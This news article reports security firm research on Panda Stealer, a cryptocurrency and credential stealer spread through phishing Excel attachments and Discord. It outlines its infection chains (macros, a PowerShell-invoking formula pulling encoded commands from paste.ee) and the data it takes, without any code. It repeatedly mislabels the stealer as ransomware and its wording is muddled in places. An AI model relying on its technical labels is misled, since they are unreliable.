A new malware is operating that targets digital currency accounts and spreads via phishing emails and Discord networks. Panda Stealer is a ransomware that has mainly infected victims in the United States, Germany, Japan, and Australia.
The ransomware was discovered for the first time by security firm Trend Micro. Panda Stealer is distributed via spam emails operating as company quotes to trick unwitting victims into opening malicious Excel files, according to a recent blog by the Tokyo-based company.
According to the security firm, the ransomware has two malware chains. The offenders append a.XLSM document containing malicious extensions in the first. The malware installs and performs the key stealer after the victim unlocks the extensions.
The spammers in the second infection chain have a .XLS attachment that contains an Excel formula that contains a PowerShell command. This command tries to connect to paste.ee, a Pastebin replacement, which connects to another encoded PowerShell command. This command, as per Trend Micro, is used to get URLs from paste.ee so that fileless payloads can be easily implemented.
“Once installed, Panda Stealer can collect details like private keys and records of past transactions from its victim’s various digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum,” the firm stated.
Nevertheless, the ransomware isn’t only target cryptocurrency accounts. It exploits passwords for other apps like Telegram, NordVPN, Discord, and Steam. It’s also able to store and share data from browsers including cookies and credentials, as well as taking snapshots of the infected device.
On VirusTotal, Trend Micro discovered another 264 files that are comparable to Panda Stealer. These tests used over 140 command and control (C&C) servers and over 10 downloaded websites.
It also added, “Some of the download sites were from Discord, containing files with names such as “build.exe,” which indicates that threat actors may be using Discord to share the Panda Stealer build.”
The Panda Stealer malware activity has been connected to an IP address belonging to virtual private servers leased from Shock Hosting, according to security researchers. The hosting firm, on the other hand, said that the domain it had allocated to this address had since been disabled.
Panda Stealer is a modified version of Collector Stealer, a malware strain that has been sold on underground markets for just $12. The malware, also recognized as DC Stealer, is marketed as a high-end information stealer.
Panda Stealer, according to Trend Micro, is linked to Collector Stealer. According to the experts, “Cybercriminal groups and script kiddies alike can use it to create their own customized version of the stealer and C2 panel. Threat actors may also augment their malware campaigns with specific features from Collector Stealer.”